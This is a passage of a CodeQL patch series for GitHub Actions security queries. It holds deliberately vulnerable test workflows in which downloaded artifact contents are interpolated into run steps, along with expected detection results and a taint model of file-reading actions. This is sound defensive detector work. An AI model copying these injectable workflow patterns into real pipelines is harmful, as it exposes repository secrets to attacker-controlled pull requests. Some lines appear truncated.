output.modified | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | | marocchino/on_artifact | * | output.* | artifact | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | | potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml index 8475711949f..5cf7bbd4e6b 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml @@ -21,69 +21,8 @@ jobs: id: pr run: echo "::set-output name=id::$( - - - body-include: '' - number: ${{ steps.pr.outputs.id }} - - - name: The job failed - if: ${{ failure() }} - uses: actions-cool/maintain-one-comment@v1.2.1 - with: - token: ${{ secrets.GITHUB_TOKEN }} - body: | - 😭 Deploy PR Preview failed. - - - - - body-include: '' - number: ${{ steps.pr.outputs.id }} - - failed: - runs-on: ubuntu-latest - if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'failure' - steps: - - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - name: pr - - - name: save PR id - id: pr - run: echo "::set-output name=id::$( - - - body-include: '' - number: ${{ steps.pr.outputs.id }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml new file mode 100644 index 00000000000..633c45661e5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml @@ -0,0 +1,23 @@ +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + # Save PR id to output + - name: Save artifact data + id: artifact + uses: juliangruber/read-file-action@v1 + with: + path: ./artifact.txt + - name: Use artifact + run: echo ${{ steps.artifact.outputs.contents }} + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml new file mode 100644 index 00000000000..92c4be4a9e8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml @@ -0,0 +1,30 @@ +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - id: artifact + run: | + echo "::set-output name=pr_number::$( bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | @@ -13,13 +12,12 @@ edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | nodes -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | semmle.label | python foo/x.py | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | @@ -42,11 +40,12 @@ nodes | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | subpaths #select -| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | python foo/x.py | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | @@ -58,3 +57,4 @@ subpaths | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 18ad272f803..57d7ff9d64b 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,7 +1,6 @@ edges -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | @@ -13,13 +12,12 @@ edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | nodes -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | semmle.label | python foo/x.py | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | @@ -42,5 +40,7 @@ nodes | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 41c465dcc27..70eb169860e 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,9 +1,8 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning7.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning8.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref '5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref '2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index b4a099672a4..4431d865417 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -9,16 +9,12 @@ edges | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | -| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | -| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | -| .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:16:9:18:40 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | -| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | +| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | @@ -40,9 +36,7 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | -| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | -| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step | -| .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | From 8289bf97b9da5faae3fc46125c6516e1939e96f2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 11:10:01 +0200 Subject: [PATCH 0406/1267] feat(models): Add support for artifact to step output --- .../codeql/actions/dataflow/ExternalFlow.qll | 9 ++++- ql/lib/ext/manual/read-file-actions.model.yml | 33 +++++++++++++++++++ .../.github/workflows/artifactpoisoning5.yml | 2 +- .../CWE-094/CodeInjectionCritical.expected | 6 ++++ .../CWE-094/CodeInjectionMedium.expected | 5 +++ 5 files changed, 53 insertions(+), 2 deletions(-) create mode 100644 ql/lib/ext/manual/read-file-actions.model.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 1d1b0c6a719..9ddba387b51 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -1,6 +1,7 @@ +private import actions private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow -private import actions +private import codeql.actions.security.ArtifactPoisoningQuery /** * MaD sources @@ -91,6 +92,12 @@ predicate madStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::Conte or input.trim().matches("input.%") and pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + or + input.trim() = "artifact" and + exists(UntrustedArtifactDownloadStep download | + pred.asExpr() = download and + download.getAFollowingStep() = uses + ) ) and succ.asExpr() = uses ) diff --git a/ql/lib/ext/manual/read-file-actions.model.yml b/ql/lib/ext/manual/read-file-actions.model.yml new file mode 100644 index 00000000000..1b9bd745a65 --- /dev/null +++ b/ql/lib/ext/manual/read-file-actions.model.yml @@ -0,0 +1,33 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["juliangruber/read-file-action", "*", "artifact", "output.content", "taint", "manual"] + - ["bfren/read-file", "*", "artifact", "output.contents", "taint", "manual"] + - ["igorskyflyer/action-readfile", "*", "artifact", "output.content", "taint", "manual"] + - ["komorebitech/read-files-action", "*", "artifact", "output.content", "taint", "manual"] + - ["jaywcjlove/github-action-read-file", "*", "artifact", "output.content", "taint", "manual"] + - ["andstor/file-reader-action", "*", "artifact", "output.contents", "taint", "manual"] + - ["Reedyuk/read-properties", "*", "artifact", "output.value", "taint", "manual"] + - ["browniebroke/read-nvmrc-action", "*", "artifact", "output.node_version", "taint", "manual"] + - ["jbutcher5/read-yaml", "*", "artifact", "output.data", "taint", "manual"] + - ["christian-draeger/read-properties", "*", "artifact", "output.*", "taint", "manual"] + - ["traversals-analytics-and-intelligence/file-reader-action", "*", "artifact", "output.content", "taint", "manual"] + - ["pietrobolcato/action-read-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["satya-500/read-file-github-action", "*", "artifact", "output.contents", "taint", "manual"] + - ["guibranco/github-file-reader-action-v2", "*", "artifact", "output.contents", "taint", "manual"] + - ["gagle/package-version", "*", "artifact", "output.version", "taint", "manual"] + - ["ActionsTools/read-json-action", "*", "artifact", "output.*", "taint", "manual"] + - ["madhead/read-java-properties", "*", "artifact", "output.*", "taint", "manual"] + - 